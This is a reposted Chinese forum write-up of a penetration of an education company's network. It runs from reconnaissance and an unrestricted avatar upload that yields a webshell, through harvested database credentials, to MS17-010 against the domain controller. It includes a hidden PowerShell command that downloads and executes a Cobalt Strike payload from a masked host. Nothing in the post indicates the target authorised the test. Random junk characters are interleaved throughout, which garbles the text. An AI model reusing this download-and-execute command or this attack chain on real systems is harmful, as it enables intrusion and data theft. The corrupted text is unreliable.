|
1 O" i# O8 D( R3 v6 h+ e! o5 V 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路. }& T4 ?* _% M5 A$ }+ f: E( q( b
( J. D e+ ]$ G" p, M- m5 d' J8 i3 @1 _1 o
# g: F. M6 Q' {2 M6 Y$ t
# Q2 j6 Z9 W" h& Z, d' y& y/ D" g3 }+ Q, @
正文; L% }& ^1 y8 k1 S, j f. |
* Q- K- f: a: J( ]
f( d0 t2 S6 m" \- v6 X 5 ^3 F1 F" b v: t
* @* U- g, P; l9 R1 t" \0 @
4 g7 w8 h* v9 l& I% ^. Y1 v' c 目标:www.xxxx.com(一家教育机构)
' ]8 W7 M6 r/ P1 K( m
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能# [7 K) a- ?4 b+ [; b* c6 ?
) Q2 ]: }! l' S2 |. p: g# X
- B4 }7 r& ^* s& S) q4 R4 ]0 n$ } { 
% }. p# `- M" v: A1 d) ] " e2 a- K" w. I3 f& M1 U
: \. [- N5 `9 w- w+ P
进行了简单的信息搜集
5 V/ D0 J: L$ ^* J
0 l- N3 G7 b" T3 _4 L1 w7 H4 p7 i& R3 c' r; |8 O
y: X5 B4 C2 M1 l% I! d
- ?9 q8 B4 i* z6 v) J8 K' l
子域名搜集6 E0 e3 v$ N' [" z7 w- ^# `
* }5 L1 H C- v7 W
8 k0 F$ K9 [% K' D! Z
 " ]3 m* Q- C( B( J% \; S& k
4 J* h" w+ Q5 a- ?- f. L/ U2 n# Q3 }/ q$ a/ }" y
fofa找资产
% y: {0 {- r- r6 }) }/ r
6 R8 x& [# j5 t9 |: s u; S( s
! @* L, s5 e0 P3 P" f
' V s7 K% }0 Q" e# ~
/ B& y% |, _5 g) J! g 
: u( |* @7 E" b( B$ O% a) S. P* c. ? l ) [) D/ C, t } n9 Z; V: \
3 _0 d {; K. X& ]* ` 一共七个资产。去重之后只有两个。
4 }8 R$ h( j$ Y3 j
& _+ R1 _1 A( m) O- ~2 e" g( X( M1 J% r" S3 R8 u' ]
$ _8 ^+ U. t, B9 Q6 h u
+ U" T3 I" e4 P2 }3 t) b
目录探测
4 [. t& f7 k& u! A8 v' W5 D$ S
8 w- I" N' E( t3 f+ A( y" q" N; n+ H; n: b3 ]+ f" l1 _
 8 W# [- R5 A3 M
! W, T8 J8 M2 z; D% }. A2 |
; A3 e, x3 }7 x4 i9 k; {& w. f 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
5 R; @5 B* P9 b/ B& R0 |
. m5 K6 O8 y4 B* G2 E: J
?0 T: g: G0 {9 `: w 5 [: k) O8 F1 g( A
+ O1 a- e- k1 N2 e! H% f" r 我又尝试了通过修改返回包来绕过登录界面
( D9 ]7 l; o1 H( l/ T
- G9 |7 X; m1 g: {; a8 N0 S5 y7 \: f8 b
 8 {# b6 P& R& A; {3 p
9 ~/ p U+ ~" B4 G& o% H
4 U% f+ h4 r4 D: c! U* e, |/ P
还是不行,尝试注入无果5 p! `$ D6 R$ r# @
) e" M8 d6 c! I' l
% s4 J2 [' f6 [ Y+ Y7 f. y
9 l1 {( P$ l' ?. b8 N/ ]% n0 Z c ! m& s! F [& c! |7 }! e
% }! U& |, c3 w) J4 e 不过我目录探测出了一处Spring信息泄露
/ q+ k6 B b' r# g+ X
' Z$ t2 O3 S, r- N, m+ P! U6 k* F' |1 U0 a6 ]9 H7 {( C
& H! ^/ t/ r H. T1 s
/ D" k$ v( t& W. H! w: x( g1 h  / Q! P! Q, T, y- X. n) I# \/ w
6 L6 k7 n) n$ R/ o- Y
7 { h( L' S8 e J- N- C 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录/ o# [& a) _, F( T' v. ~- U! i
" p& e- r# B/ Y6 H5 s9 v
1 q+ s* I' l0 l  # E r8 D+ A2 q7 s1 b6 ?
u& ~5 X N4 ]: u
( r. z" ?: G7 [9 b 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
! R* T) K1 h0 K8 l% r- G
* `. ]" w2 b" [* e5 }! D' M0 N, k# K& F9 B; z: h: P# L
 ; O2 f; t4 [& r5 }6 p$ t2 s9 }
1 s# h* y, o( e+ d# n
9 d9 P* a& }2 u2 c" T { 获取有些师傅到这一步就手机抓包电脑测了。
6 `2 W. l A9 c7 U+ `! }) Q
" S& C1 v0 W! k# f) w' D( o0 l: R$ Z0 e$ ]0 m# o- H7 A ]
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。2 u+ X: b2 K/ ~* E0 t m( ^
$ T4 Y& e: y0 @; S$ f9 O, k
; f j/ R$ x g) G, d9 u4 u, H 其中在一个公众号发现了小程序,可以进行注册。0 q y) ^6 E- N% `) x+ E* t
d4 V o C" q* ~
q( |& d- H# ]4 [ ~) E 看到了头像上传,尝试上传获取WebShell8 j: R8 ]. @" k' \$ q
9 M/ V8 H7 @: D w
# j. P/ u2 @6 a( G2 a* f# P
+ [- f; ^/ O1 I7 J G9 j/ }, f3 M # N) n. j, ^8 i: F6 c! ~7 g
$ j$ u$ J4 B/ J, R
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
2 M4 b( J" f9 e+ r
- B6 d1 D. m4 O t* l# ]: \4 s( z7 `- ~) [- j4 t; Q
 ; V6 i" u7 ^( f$ K; ]' p
6 m# l7 A0 J4 v0 j( H4 B' u3 N5 k: [, n/ u$ f, k9 n
然后上了大马
6 I% ]: p& r9 F# V3 T( w
1 P" |7 Z3 g. O& b5 h" d+ Q7 I
4 Q* f5 |* u a  " m; K2 k) G0 ^$ y* v- f- S) I
- @1 a$ b! ]$ w6 W; |5 A5 f% z7 P. q+ \& ?
# d+ i8 N, d0 ]' a" P. N
^7 E" p8 B% E; H1 e8 ]
/ l2 W$ g; F; F/ _2 M. P4 | 通过翻找文件发现数据库账号密码2 J* L9 Z: B- |% ?; K3 M1 p
2 ^' ~: q" E# p+ A7 h" K* t" O0 ~6 `' W# i# x
 ) J! _& S" U% N7 e" M6 U
8 p" c0 c' q9 S$ ?! c( I$ d
3 R% G: L/ O9 @2 E6 b1 I* s --内网渗透
' _5 l( d( Z X
b" _3 A: ~; B4 ]4 G- _7 o/ P' a0 |! Z- r; U; X2 z
直接通过powershell执行 cs上线$ i9 Z7 d2 G4 O8 l" Z
0 s% S+ U7 `* V+ n
' c: X4 D, n2 \0 C powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
2 {# L1 @7 a3 h7 @4 f1 O/ n . G& ~8 {, @! u0 s) P: a: h7 _
3 @3 a" b1 L# s1 _8 y
( L" d& e! g. P/ g6 Z O+ ]# {0 F* H7 [. ^- Y G
' s# p* z+ M, w% X 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
" f+ s2 F7 g4 x4 [' m 2 k. G3 T+ g& C5 M: o
H+ ?6 M: i* P# W: Z
 ; h3 L/ [, f3 i) X( h0 I" I
! D- a: X: [0 g( z2 T; R4 L/ H
: x* x$ n# r# e$ N( I9 T
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
. U* {$ t7 A7 v& [7 ^
: q/ @$ j- g0 ]* O, w
0 W& N2 x: `. Y9 t
" g, O' ?7 P8 d9 [5 C) n
/ H. x5 q8 W5 m# F3 w2 ~
/ \) @8 w m- [ 
/ d, d8 u' J! ]3 h+ } " f# Q" g1 ~# _, D
/ H3 Q7 ^# r5 D' U x' z; Q
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
* {7 z+ B# i# {6 G* _
" m0 B- K& g. P' [# w
$ w, t3 r: V j
6 H/ `# m/ T E. Q+ h
; L* L& I T7 [( _  % ^9 k; [1 q ^+ C
: g4 g9 ?2 u8 {& o1 ~; h
0 I: a$ d# {1 O8 L0 ]3 r* t
# T2 M* i) _3 W
. L" J" t+ I! z! s6 t' W9 l0 [- P; k/ D4 H, T* d' k
6 ?* d3 c0 p& N9 h* w# S3 O$ \0 H0 r/ u& X" j( T
% S2 t% ~) o5 U d) Y
+ s: I0 U r$ [) W2 ?3 P8 @
" B2 B- y# Y# \6 a4 s1 N6 k; Z 小结
0 ?; S0 @/ V- o ( x7 F& O/ _4 q1 I' j* N% K A+ O
- C2 R- L. [% g1 c# x* R5 @, A
. {# M% ~2 B! x8 e( v: ^, b( n
# x' P6 e# J6 d
( A4 E; p9 ]$ A3 y% | 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
; l1 s1 n) l+ G* L% v& o( Q- e 6 R5 a8 |5 }% J; E+ @' K" f6 ?4 J
8 k3 X7 x! s4 y# @: E9 }3 w- x* z - e- o1 o9 D8 M) S1 S. E1 Q( m) ^
8 @2 X0 v4 c* ]0 V, [8 ~8 }& k% C, r) J/ _; ~1 a: X' K# [
-
8 Y( ?; g* V9 u7 s `: j ) _7 e: s6 O9 A! X7 B0 h
( [( w. L/ T( H! C- S
-
! w, a" J6 Q( e" R; [3 P0 ~7 x2 i$ H
" m/ C" ^+ e5 _4 P6 k# ^. i; f7 ]1 @
; c& n, {8 D4 l" a! T - h- m: j. R7 E/ B7 X R9 P
3 e" q1 a/ p7 ]$ }, ]9 p! X9 p
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html( _8 w8 I1 q' v/ K) x! R/ I
" o9 N1 G0 r: O7 {
8 m, n4 V! g/ g8 J" V! u: A4 b( x
5 h" i, J" p o' n | 
发表于 2024-3-1 19:41:32
收藏
分享
支持
反对